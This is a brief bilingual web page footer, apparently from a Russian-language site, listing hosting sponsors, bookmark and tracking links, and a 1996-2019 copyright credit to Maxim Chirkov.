    Inferno Solutions
    Hosting by Ihor
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2019 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру